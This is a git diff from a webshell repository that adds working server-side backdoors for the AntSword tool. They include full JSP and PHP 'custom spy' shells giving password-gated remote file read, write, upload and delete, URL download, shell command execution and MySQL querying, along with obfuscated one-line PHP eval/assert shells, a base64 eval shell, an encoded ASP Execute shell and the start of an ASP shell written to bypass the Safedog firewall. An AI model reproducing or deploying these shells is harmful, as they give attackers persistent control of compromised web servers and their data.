  }
 //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
-/* mysql <EFBFBD><EFBFBD><EFBFBD><EFBFBD> */
+/* mysql äàìï */
 if ($_POST['cmd']=="mysql_dump")
  {
   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
@@ -1487,7 +1469,7 @@ if ($_POST['cmd']=="mysql_dump")
 
    if(@mysql_select_db($_POST['mysql_db'],$db))
     {
-     // <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>
+     // èíôà î äàìïå
      $sql1  = "# MySQL dump created by r57shell\r\n";
      $sql1 .= "# homepage: http://rst.void.ru\r\n";
      $sql1 .= "# ---------------------------------\r\n";
@@ -1496,7 +1478,7 @@ if ($_POST['cmd']=="mysql_dump")
      $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
      $sql1 .= "# ---------------------------------\r\n\r\n";
 
-     // <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+     // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû
      $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
      $row   = @mysql_fetch_row($res);
      $sql1 .= $row[1]."\r\n\r\n";
@@ -1504,7 +1486,7 @@ if ($_POST['cmd']=="mysql_dump")
 
      $sql2 = '';
 
-     // <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+     // ïîëó÷àåì äàííûå òàáëèöû
      $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
      if (@mysql_num_rows($res) > 0) {
      while ($row = @mysql_fetch_assoc($res)) {
@@ -1516,7 +1498,7 @@ if ($_POST['cmd']=="mysql_dump")
      }
      $sql2 .= "\r\n# ---------------------------------";
      }
-    // <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+    // ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð
     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
     else { echo $sql1.$sql2; }
     } // end if(@mysql_select_db($_POST['mysql_db'],$db))

README.md

@@ -18,10 +18,13 @@
 
 本项目提供的工具，禁止从事非法活动，此项目，仅供测试，所造成的一切后果，与本人无关。
 
-Author：tennc
+Author ：tennc
 
 http://tennc.github.io/webshell
 
-<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Creative Commons License" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/80x15.png" /></a><br />This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License</a>.
-<p>
-<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/deed.zh"><img alt="知识共享许可协议" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/80x15.png" /></a><br />本作品采用<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/deed.zh">知识共享署名-非商业性使用-相同方式共享 3.0 未本地化版本许可协议</a>进行许可。
+license : GPL v3
+
+## Download link
+Check github releases. Latest:
+
+[https://github.com/tennc/webshell/releases](https://github.com/tennc/webshell/releases)

antSword-shells/README.md

@@ -0,0 +1,18 @@
+## AntSword-Shell-Scripts
+> 此目录用于存放中国蚁剑一些示例的服务端脚本文件，仅供参考。
+
+AntSword(中国蚁剑)是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
+
+官网地址：http://uyu.us
+
+项目地址：https://github.com/antoor/antSword
+
+### PHP
+
+1. [PHP Custom Spy for Mysql](./php_custom_spy_for_mysql.php)
+2. [PHP Create_Function](./php_create_function.php)
+3. [PHP Assert](./php_assert.php)
+
+### JSP
+
+1. [JSP Custom Spy for Mysql](./jsp_custom_spy_for_mysql.jsp)

antSword-shells/jsp_custom_spy_for_mysql.jsp

@@ -0,0 +1,381 @@
+<%--
+             _   ____                       _
+  __ _ _ __ | |_/ ___|_      _____  _ __ __| |
+ / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
+| (_| | | | | |_ ___) \ V  V / (_) | | | (_| |
+ \__,_|_| |_|\__|____/ \_/\_/ \___/|_|  \__,_|
+———————————————————————————————————————————————
+    AntSword JSP Custom Spy for Mysql
+                    Author:Medici.Yan
+———————————————————————————————————————————————
+
+说明：
+ 1. AntSword >= v1.1-dev
+ 2. 创建 Shell 时选择 custom 模式连接
+ 3. 数据库连接：
+    com.mysql.jdbc.Driver
+    jdbc:mysql://localhost/test?user=root&password=123456
+
+    注意：以上是两行
+ 4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致，如果选择 default 则需要将 encoder 值设置为空
+
+ChangeLog:
+
+  Date: 2016/04/06 v1.1
+   1. 修正下载文件参数设置错误
+   2. 修正一些注释的细节
+  Date: 2016/03/26 v1
+   1. 文件系统 和 terminal 管理
+   2. mysql 数据库支持
+   3. 支持 base64 和 hex 编码
+--%>
+<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
+<%!
+    String Pwd = "ant";   //连接密码
+    // 数据编码 3 选 1
+    String encoder = ""; // default
+    // String encoder = "base64"; //base64
+    // String encoder = "hex"; //hex
+    String cs = "UTF-8"; // 脚本自身编码
+    String EC(String s) throws Exception {
+        if(encoder.equals("hex") || encoder == "hex") return s;
+        return new String(s.getBytes("ISO-8859-1"), cs);
+    }
+
+    String showDatabases(String encode, String conn) throws Exception {
+        String sql = "show databases"; // mysql
+        String columnsep = "\t";
+        String rowsep = "";
+        return executeSQL(encode, conn, sql, columnsep, rowsep, false);
+    }
+
+    String showTables(String encode, String conn, String dbname) throws Exception {
+        String sql = "show tables from " + dbname; // mysql
+        String columnsep = "\t";
+        String rowsep = "";
+        return executeSQL(encode, conn, sql, columnsep, rowsep, false);
+    }
+
+    String showColumns(String encode, String conn, String dbname, String table) throws Exception {
+        String columnsep = "\t";
+        String rowsep = "";
+        String sql = "select * from " + dbname + "." + table + " limit 0,0"; // mysql
+        return executeSQL(encode, conn, sql, columnsep, rowsep, true);
+    }
+
+    String query(String encode, String conn, String sql) throws Exception {
+        String columnsep = "\t|\t"; // general
+        String rowsep = "\r\n";
+        return executeSQL(encode, conn, sql, columnsep, rowsep, true);
+    }
+
+    String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
+            throws Exception {
+        String ret = "";
+        conn = (EC(conn));
+        String[] x = conn.trim().replace("\r\n", "\n").split("\n");
+        Class.forName(x[0].trim());
+        String url = x[1] + "&characterEncoding=" + decode(EC(encode),encoder);
+        Connection c = DriverManager.getConnection(url);
+        Statement stmt = c.createStatement();
+        ResultSet rs = stmt.executeQuery(sql);
+        ResultSetMetaData rsmd = rs.getMetaData();
+
+        if (needcoluname) {
+            for (int i = 1; i <= rsmd.getColumnCount(); i++) {
+                String columnName = rsmd.getColumnName(i);
+                ret += columnName + columnsep;
+            }
+            ret += rowsep;
+        }
+
+        while (rs.next()) {
+            for (int i = 1; i <= rsmd.getColumnCount(); i++) {
+                String columnValue = rs.getString(i);
+                ret += columnValue + columnsep;
+            }
+            ret += rowsep;
+        }
+        return ret;
+    }
+
+    String WwwRootPathCode(HttpServletRequest r) throws Exception {
+        String d = r.getSession().getServletContext().getRealPath("/");
+        String s = "";
+        if (!d.substring(0, 1).equals("/")) {
+            File[] roots = File.listRoots();
+            for (int i = 0; i < roots.length; i++) {
+                s += roots[i].toString().substring(0, 2) + "";
+            }
+        } else {
+            s += "/";
+        }
+        return s;
+    }
+
+    String FileTreeCode(String dirPath) throws Exception {
+        File oF = new File(dirPath), l[] = oF.listFiles();
+        String s = "", sT, sQ, sF = "";
+        java.util.Date dt;
+        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+        for (int i = 0; i < l.length; i++) {
+            dt = new java.util.Date(l[i].lastModified());
+            sT = fm.format(dt);
+            sQ = l[i].canRead() ? "R" : "";
+            sQ += l[i].canWrite() ? " W" : "";
+            if (l[i].isDirectory()) {
+                s += l[i].getName() + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
+            } else {
+                sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
+            }
+        }
+        return s += sF;
+    }
+
+    String ReadFileCode(String filePath) throws Exception {
+        String l = "", s = "";
+        BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath))));
+        while ((l = br.readLine()) != null) {
+            s += l + "\r\n";
+        }
+        br.close();
+        return s;
+    }
+
+    String WriteFileCode(String filePath, String fileContext) throws Exception {
+        BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(filePath))));
+        bw.write(fileContext);
+        bw.close();
+        return "1";
+    }
+
+    String DeleteFileOrDirCode(String fileOrDirPath) throws Exception {
+        File f = new File(fileOrDirPath);
+        if (f.isDirectory()) {
+            File x[] = f.listFiles();
+            for (int k = 0; k < x.length; k++) {
+                if (!x[k].delete()) {
+                    DeleteFileOrDirCode(x[k].getPath());
+                }
+            }
+        }
+        f.delete();
+        return "1";
+    }
+
+    void DownloadFileCode(String filePath, HttpServletResponse r) throws Exception {
+        int n;
+        byte[] b = new byte[512];
+        r.reset();
+        ServletOutputStream os = r.getOutputStream();
+        BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath));
+        os.write(("->|").getBytes(), 0, 3);
+        while ((n = is.read(b, 0, 512)) != -1) {
+            os.write(b, 0, n);
+        }
+        os.write(("|<-").getBytes(), 0, 3);
+        os.close();
+        is.close();
+    }
+
+    String UploadFileCode(String savefilePath, String fileHexContext) throws Exception {
+        String h = "0123456789ABCDEF";
+        File f = new File(savefilePath);
+        f.createNewFile();
+        FileOutputStream os = new FileOutputStream(f);
+        for (int i = 0; i < fileHexContext.length(); i += 2) {
+            os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
+        }
+        os.close();
+        return "1";
+    }
+
+    String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception {
+        File sf = new File(sourceFilePath), df = new File(targetFilePath);
+        if (sf.isDirectory()) {
+            if (!df.exists()) {
+                df.mkdir();
+            }
+            File z[] = sf.listFiles();
+            for (int j = 0; j < z.length; j++) {
+                CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName());
+            }
+        } else {
+            FileInputStream is = new FileInputStream(sf);
+            FileOutputStream os = new FileOutputStream(df);
+            int n;
+            byte[] b = new byte[1024];
+            while ((n = is.read(b, 0, 1024)) != -1) {
+                os.write(b, 0, n);
+            }
+            is.close();
+            os.close();
+        }
+        return "1";
+    }
+
+    String RenameFileOrDirCode(String oldName, String newName) throws Exception {
+        File sf = new File(oldName), df = new File(newName);
+        sf.renameTo(df);
+        return "1";
+    }
+
+    String CreateDirCode(String dirPath) throws Exception {
+        File f = new File(dirPath);
+        f.mkdir();
+        return "1";
+    }
+
+    String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception {
+        File f = new File(fileOrDirPath);
+        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+        java.util.Date dt = fm.parse(aTime);
+        f.setLastModified(dt.getTime());
+        return "1";
+    }
+
+    String WgetCode(String urlPath, String saveFilePath) throws Exception {
+        URL u = new URL(urlPath);
+        int n = 0;
+        FileOutputStream os = new FileOutputStream(saveFilePath);
+        HttpURLConnection h = (HttpURLConnection) u.openConnection();
+        InputStream is = h.getInputStream();
+        byte[] b = new byte[512];
+        while ((n = is.read(b)) != -1) {
+            os.write(b, 0, n);
+        }
+        os.close();
+        is.close();
+        h.disconnect();
+        return "1";
+    }
+
+    String SysInfoCode(HttpServletRequest r) throws Exception {
+        String d = r.getSession().getServletContext().getRealPath("/");
+        String serverInfo = System.getProperty("os.name");
+        String separator = File.separator;
+        String user = System.getProperty("user.name");
+        String driverlist = WwwRootPathCode(r);
+        return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
+    }
+
+    boolean isWin() {
+        String osname = System.getProperty("os.name");
+        osname = osname.toLowerCase();
+        if (osname.startsWith("win"))
+            return true;
+        return false;
+    }
+
+    String ExecuteCommandCode(String cmdPath, String command) throws Exception {
+        StringBuffer sb = new StringBuffer("");
+        String[] c = { cmdPath, !isWin() ? "-c" : "/c", command };
+        Process p = Runtime.getRuntime().exec(c);
+        CopyInputStream(p.getInputStream(), sb);
+        CopyInputStream(p.getErrorStream(), sb);
+        return sb.toString();
+    }
+
+    String decode(String str) {
+        byte[] bt = null;
+        try {
+            sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
+            bt = decoder.decodeBuffer(str);
+        } catch (IOException e) {
+            e.printStackTrace();
+        }
+        return new String(bt);
+    }
+    String decode(String str, String encode){
+        if(encode.equals("hex") || encode=="hex"){
+            if(str=="null"||str.equals("null")){
+                return "";
+            }
+            StringBuilder sb = new StringBuilder();
+            StringBuilder temp = new StringBuilder();
+            try{
+                for(int i=0; i<str.length()-1; i+=2 ){
+                    String output = str.substring(i, (i + 2));
+                    int decimal = Integer.parseInt(output, 16);
+                    sb.append((char)decimal);
+                    temp.append(decimal);
+                }
+            }catch(Exception e){
+                e.printStackTrace();
+            }
+            return sb.toString();
+        }else if(encode.equals("base64") || encode == "base64"){
+            byte[] bt = null;
+            try {
+                sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
+                bt = decoder.decodeBuffer(str);
+            } catch (IOException e) {
+                e.printStackTrace();
+            }
+            return new String(bt);
+        }
+        return str;
+    }
+
+    void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
+        String l;
+        BufferedReader br = new BufferedReader(new InputStreamReader(is));
+        while ((l = br.readLine()) != null) {
+            sb.append(l + "\r\n");
+        }
+        br.close();
+    }%>
+<%
+    response.setContentType("text/html");
+    response.setCharacterEncoding(cs);
+    StringBuffer sb = new StringBuffer("");
+    try {
+        String funccode = EC(request.getParameter(Pwd) + "");
+        String z0 = decode(EC(request.getParameter("z0")+""), encoder);
+        String z1 = decode(EC(request.getParameter("z1") + ""), encoder);
+        String z2 = decode(EC(request.getParameter("z2") + ""), encoder);
+        String z3 = decode(EC(request.getParameter("z3") + ""), encoder);
+        String[] pars = { z0, z1, z2, z3};
+        sb.append("->|");
+
+        if (funccode.equals("B")) {
+            sb.append(FileTreeCode(pars[1]));
+        } else if (funccode.equals("C")) {
+            sb.append(ReadFileCode(pars[1]));
+        } else if (funccode.equals("D")) {
+            sb.append(WriteFileCode(pars[1], pars[2]));
+        } else if (funccode.equals("E")) {
+            sb.append(DeleteFileOrDirCode(pars[1]));
+        } else if (funccode.equals("F")) {
+            DownloadFileCode(pars[1], response);
+        } else if (funccode.equals("U")) {
+            sb.append(UploadFileCode(pars[1], pars[2]));
+        } else if (funccode.equals("H")) {
+            sb.append(CopyFileOrDirCode(pars[1], pars[2]));
+        } else if (funccode.equals("I")) {
+            sb.append(RenameFileOrDirCode(pars[1], pars[2]));
+        } else if (funccode.equals("J")) {
+            sb.append(CreateDirCode(pars[1]));
+        } else if (funccode.equals("K")) {
+            sb.append(ModifyFileOrDirTimeCode(pars[1], pars[2]));
+        } else if (funccode.equals("L")) {
+            sb.append(WgetCode(pars[1], pars[2]));
+        } else if (funccode.equals("M")) {
+            sb.append(ExecuteCommandCode(pars[1], pars[2]));
+        } else if (funccode.equals("N")) {
+            sb.append(showDatabases(pars[0], pars[1]));
+        } else if (funccode.equals("O")) {
+            sb.append(showTables(pars[0], pars[1], pars[2]));
+        } else if (funccode.equals("P")) {
+            sb.append(showColumns(pars[0], pars[1], pars[2], pars[3]));
+        } else if (funccode.equals("Q")) {
+            sb.append(query(pars[0], pars[1], pars[2]));
+        } else if (funccode.equals("A")) {
+            sb.append(SysInfoCode(request));
+        }
+    } catch (Exception e) {
+        sb.append("ERROR" + "://" + e.toString());
+    }
+    sb.append("|<-");
+    out.print(sb.toString());
+%>

antSword-shells/php_assert.php

@@ -0,0 +1 @@
+<?php $ant=base64_decode("YXNzZXJ0");$ant($_POST['ant']);?>

antSword-shells/php_create_function.php

@@ -0,0 +1 @@
+<?php $ant=create_function("", base64_decode('QGV2YWwoJF9QT1NUWyJhbnQiXSk7'));$ant();?>

antSword-shells/php_custom_spy_for_mysql.php

@@ -0,0 +1,406 @@
+<?php
+/**
+*              _   ____                       _
+*   __ _ _ __ | |_/ ___|_      _____  _ __ __| |
+*  / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
+* | (_| | | | | |_ ___) \ V  V / (_) | | | (_| |
+*  \__,_|_| |_|\__|____/ \_/\_/ \___/|_|  \__,_|
+* ———————————————————————————————————————————————
+*     AntSword PHP Custom Spy for Mysql
+*                     Author:Medici.Yan
+* ———————————————————————————————————————————————
+*
+* 使用说明：
+*  1. AntSword >= v1.1-dev
+*  2. 创建 Shell 时选择 custom 模式连接
+*  3. 数据库连接：
+*    <H>localhost</H>
+*    <U>root</U>
+*    <P>123456</P>
+*
+*  4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致，如果选择 default 则需要将 encoder 值设置为空
+*
+* ChangeLog:
+* 
+*   Date: 2016/04/06 v1.0
+*    1. 文件系统 和 terminal 管理
+*    2. mysql 数据库支持
+*    3. 支持 base64 和 hex 编码
+**/
+
+$pwd = "ant"; //连接密码
+//数据编码 3 选 1
+$encoder = ""; // default
+// $encoder = "base64"; //base64
+// $encoder = "hex"; // hex
+$cs = "UTF-8";
+
+/**
+* 字符编码处理
+**/
+function EC($s){
+    global $cs;
+    $sencode = mb_detect_encoding($s, array("ASCII","UTF-8","GB2312","GBK",'BIG5')); 
+    $ret = "";
+    try {
+        $ret = mb_convert_encoding($s, $cs, $sencode);
+    } catch (Exception $e) {
+        try {
+            $ret = iconv($sencode, $cs, $s);    
+        } catch (Exception $e) {
+            $ret = $s;
+        }
+    }
+    return $ret;
+}
+/*传输解码*/
+function decode($s){
+    global $encoder;
+    $ret = "";
+    switch ($encoder) {
+        case 'base64':
+            $ret = base64_decode($s);
+            break;
+        case 'hex':
+            for ($i=0; $i < strlen($s)-1; $i+=2) { 
+                $output = substr($s, $i, 2);
+                $decimal = intval($output, 16);
+                $ret .= chr($decimal);
+            }
+            break;
+        default:
+            $ret = $s;
+            break;
+    }
+    return $ret;
+}
+function showDatabases($encode, $conf){
+    $sql = "show databases";
+    $columnsep = "\t";
+    $rowsep = "";
+    return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false);
+}
+function showTables($encode, $conf, $dbname){
+    $sql = "show tables from ".$dbname; // mysql
+    $columnsep = "\t";
+    $rowsep = "";
+    return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false);
+}
+
+function showColumns($encode, $conf, $dbname, $table){
+    $columnsep = "\t";
+    $rowsep = "";
+    $sql = "select * from ".$dbname.".".$table." limit 0,0"; // mysql
+    return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true);
+}
+
+function query($encode, $conf, $sql){
+    $columnsep = "\t|\t"; // general
+    $rowsep = "\r\n";
+    return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true);
+}
+
+function executeSQL($encode, $conf, $sql, $columnsep, $rowsep, $needcoluname){
+    $ret = "";
+    $m=get_magic_quotes_gpc();
+    if ($m) {
+        $conf = stripslashes($conf);
+    }
+    $conf = (EC($conf));
+
+    /*
+    <H>localhost</H>
+    <U>root</U>
+    <P>root</P>
+    */
+    $host="";
+    $user="";
+    $password="";
+    if (preg_match('/<H>(.+?)<\/H>/i', $conf, $data)) {
+        $host = $data[1];    
+    }
+    if (preg_match('/<U>(.+?)<\/U>/i', $conf, $data)) {
+        $user = $data[1];    
+    }
+    if (preg_match('/<P>(.+?)<\/P>/i', $conf, $data)) {
+        $password = $data[1];    
+    }
+    $encode = decode(EC($encode));
+    $conn = @mysqli_connect($host, $user, $password);
+    $res = @mysqli_query($conn, $sql);
+    $i=0;
+    if ($needcoluname) {
+        while ($col=@mysqli_fetch_field($res)) {
+            $ret .= $col->name.$columnsep;
+            $i++;
+        }
+        $ret .= $rowsep;
+    }
+    while($rs=@mysqli_fetch_row($res)){
+        for($c = 0; $c <= $i; $c++){
+            $ret .= trim($rs[$c]).$columnsep;
+        }
+        $ret.=$rowsep;
+    }
+    return $ret;
+}
+
+function BaseInfo(){
+    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
+    if($D==""){
+        $D=dirname($_SERVER["PATH_TRANSLATED"]);
+    }
+    $R="{$D}\t";
+    if(substr($D,0,1)!="/"){
+        foreach(range("A","Z")as $L)
+            if(is_dir("{$L}:"))
+                $R.="{$L}:";
+    }else{
+        $R.="/";
+    }
+    $R.="\t";
+    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
+    $s=($u)?$u["name"]:@get_current_user();
+    $R.=php_uname();
+    $R.="\t{$s}";
+    return $R;
+}
+function FileTreeCode($D){
+    $ret = "";
+    $F=@opendir($D);
+    if($F==NULL){
+        $ret = "ERROR:// Path Not Found Or No Permission!";
+    }else{
+        $M=NULL;
+        $L=NULL;
+        while($N=@readdir($F)){
+            $P=$D."/".$N;
+            $T=@date("Y-m-d H:i:s",@filemtime($P));
+            @$E=substr(base_convert(@fileperms($P),10,8),-4);
+            $R="\t".$T."\t".@filesize($P)."\t".$E."\n";
+            if(@is_dir($P))
+                $M.=$N."/".$R;
+            else
+                $L.=$N.$R;
+        }
+        $ret .= $M.$L;
+        @closedir($F);
+    }
+    return $ret;
+}
+
+function ReadFileCode($F){
+    $ret = "";
+    try {
+        $P = @fopen($F,"r");
+        $ret = (@fread($P,filesize($F)));
+        @fclose($P);
+    } catch (Exception $e) {
+        $ret = "ERROR://".$e;
+    }
+    return $ret;
+}
+function WriteFileCode($path, $content){
+    return @fwrite(fopen(($path),"w"),($content))?"1":"0";
+}
+function DeleteFileOrDirCode($fileOrDirPath){
+    function df($p){
+        $m=@dir($p);
+        while(@$f=$m->read()){
+            $pf=$p."/".$f;
+            if((is_dir($pf))&&($f!=".")&&($f!="..")){
+                @chmod($pf,0777);
+                df($pf);
+            }
+            if(is_file($pf)){
+                @chmod($pf,0777);
+                @unlink($pf);
+            }
+        }
+        $m->close();
+        @chmod($p,0777);
+        return @rmdir($p);
+    }
+    $F=(get_magic_quotes_gpc()?stripslashes($fileOrDirPath):$fileOrDirPath);
+    if(is_dir($F)){
+        return (df($F));
+    }
+    else{
+        return (file_exists($F)?@unlink($F)?"1":"0":"0");
+    }
+}
+
+function DownloadFileCode($filePath){
+    $F=(get_magic_quotes_gpc()?stripslashes($filePath):$filePath);
+    $fp=@fopen($F,"r");
+    if(@fgetc($fp)){
+        @fclose($fp);
+        @readfile($F);
+    }else{
+        echo("ERROR:// Can Not Read");
+    }
+}
+function UploadFileCode($path, $content){
+    $f=$path;
+    $c=$content;
+    $c=str_replace("\r","",$c);
+    $c=str_replace("\n","",$c);
+    $buf="";
+    for($i=0;$i<strlen($c);$i+=2)
+        $buf.=urldecode("%".substr($c,$i,2));
+    return (@fwrite(fopen($f,"a"),$buf)?"1":"0");
+}
+function CopyFileOrDirCode($path, $content){
+    $m=get_magic_quotes_gpc();
+    $fc=($m?stripslashes($path):$path);
+    $fp=($m?stripslashes($content):$content);
+    function xcopy($src,$dest){
+        if(is_file($src)){
+            if(!copy($src,$dest))
+                return false;
+            else
+                return true;
+        }
+        $m=@dir($src);
+        if(!is_dir($dest))
+            if(!@mkdir($dest))
+                return false;
+        while($f=$m->read()){
+            $isrc=$src.chr(47).$f;
+            $idest=$dest.chr(47).$f;
+            if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){
+                if(!xcopy($isrc,$idest))return false;
+            }else if(is_file($isrc)){
+                if(!copy($isrc,$idest))
+                    return false;
+            }
+        }
+        return true;
+    }
+    return (xcopy($fc,$fp)?"1":"0");
+}
+
+function RenameFileOrDirCode($oldName, $newName){
+    $m=get_magic_quotes_gpc();
+    $src=(m?stripslashes($oldName):$oldName);
+    $dst=(m?stripslashes($newName):$newName);
+    return (rename($src,$dst)?"1":"0");
+}
+function CreateDirCode($name){
+    $m=get_magic_quotes_gpc();
+    $f=($m?stripslashes($name):$name);
+    return (mkdir($f)?"1":"0");
+}
+function ModifyFileOrDirTimeCode($fileOrDirPath, $newTime){
+    $m=get_magic_quotes_gpc();
+    $FN=(m?stripslashes($fileOrDirPath):$fileOrDirPath);
+    $TM=strtotime((m?stripslashes($newTime):$newTime));
+    if(file_exists($FN)){
+        return (@touch($FN,$TM,$TM)?"1":"0");
+    }else{
+        return ("0");
+    }
+}
+
+function WgetCode($urlPath, $savePath){
+    $fR=$urlPath;
+    $fL=$savePath;
+    $F=@fopen($fR,chr(114));
+    $L=@fopen($fL,chr(119));
+    if($F && $L){
+        while(!feof($F))
+            @fwrite($L,@fgetc($F));
+        @fclose($F);
+        @fclose($L);
+        return "1";
+    }else{
+        return "0";
+    }
+}
+
+function ExecuteCommandCode($cmdPath, $command){
+    $p=$cmdPath;
+    $s=$command;
+    $d=dirname($_SERVER["SCRIPT_FILENAME"]);
+    $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
+    $r="{$p} {$c}";
+    @system($r." 2>&1",$ret);
+    return ($ret!=0)?"ret={$ret}":"";
+}
+
+@ini_set("display_errors", "0");
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+
+$funccode = EC($_REQUEST[$pwd]);
+$z0 = decode(EC($_REQUEST['z0']));
+$z1 = decode(EC($_REQUEST['z1']));
+$z2 = decode(EC($_REQUEST['z2']));
+$z3 = decode(EC($_REQUEST['z3']));
+
+// echo "<meta HTTP-EQUIV=\"csontent-type\" content=\"text/html; charset={$cs}\">";
+echo "->|";
+$ret = "";
+try {
+    switch ($funccode) {
+        case 'A':
+            $ret = BaseInfo();
+            break;
+        case 'B':
+            $ret = FileTreeCode($z1);
+            break;
+        case 'C':
+            $ret = ReadFileCode($z1);
+            break;
+        case 'D':
+            $ret = WriteFileCode($z1, $z2);
+            break;
+        case 'E':
+            $ret = DeleteFileOrDirCode($z1);
+            break;
+        case 'F':
+            DownloadFileCode($z1);
+            break;
+        case 'U':
+            $ret = UploadFileCode($z1, $z2);
+            break;
+        case 'H':
+            $ret = CopyFileOrDirCode($z1, $z2);
+            break;
+        case 'I':
+            $ret = RenameFileOrDirCode($z1, $z2);
+            break;
+        case 'J':
+            $ret = CreateDirCode($z1);
+            break;
+        case 'K':
+            $ret = ModifyFileOrDirTimeCode($z1, $z2);
+            break;
+        case 'L':
+            $ret = WgetCode($z1, $z2);
+            break;
+        case 'M':
+            $ret = ExecuteCommandCode($z1, $z2);
+            break;
+        case 'N':
+            $ret = showDatabases($z0, $z1);
+            break;
+        case 'O':
+            $ret = showTables($z0, $z1, $z2);
+            break;
+        case 'P':
+            $ret = showColumns($z0, $z1, $z2, $z3);
+            break;
+        case 'Q':
+            $ret = query($z0, $z1, $z2);
+            break;
+        default:
+            // $ret = "Wrong Password";
+            break;
+    }
+} catch (Exception $e) {
+    $ret = "ERROR://".$e;
+}
+echo $ret;
+echo "|<-";
+?>

antSword/mybase.md

@@ -0,0 +1,33 @@
+shell code
+```php
+<?php 
+$a = $_POST['n985de9'];
+if(isset($a)) {
+    eval(base64_decode($a));
+}
+?>
+```
+
+add : source/core/php/encoder/mybase64.js
+![](https://raw.githubusercontent.com/tennc/webshell/master/antSword/2016051523140225737.png)
+
+```js
+module.exports = (pwd, data) => {
+  data[pwd] = new Buffer(data['_']).toString('base64');
+  delete data['_'];
+  return data;
+}
+```
+
+edit : sources/core/php/index.js < add some code: regedit mybase64.js
+![](https://raw.githubusercontent.com/tennc/webshell/master/antSword/2016051523132374985.png)
+
+```js
+  get encoders() {
+    return ['chr', 'base64', 'mybase64'];
+  }
+```
+restart antsword, and add shell, select mybase64 encode  for this shell code.
+![](https://raw.githubusercontent.com/tennc/webshell/master/antSword/2016051523122747980.png)
+
+![](https://raw.githubusercontent.com/tennc/webshell/master/antSword/2016051523124431883.png)

asp/base.asp

@@ -0,0 +1 @@
+<%Execute(DeAsc("%119%136%115%126%50%132%119%131%135%119%133%134%58%52%116%115%133%119%52%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function%>

asp/bypass_safedog_01.asp

@@ -0,0 +1,34 @@
+<script runat="server" language="JScript">
+function exs(str) {
+  var q = "u";
+  var w = "afe";
+  var a = q + "ns" + w;
+  var b= /*///*/eval(str,a);
+  return(b);
+   }
+function dec(str,key) {
+  var k,q,t;
+  var s="";
+  var p="";
